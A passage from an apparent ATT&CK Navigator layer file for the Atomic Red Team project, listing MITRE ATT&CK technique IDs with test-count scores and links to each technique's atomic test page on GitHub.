Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":78,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222.002","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1529","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1531","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546","score":39,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":45,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.001","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":42,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":38,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":30,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":118,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":52,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View 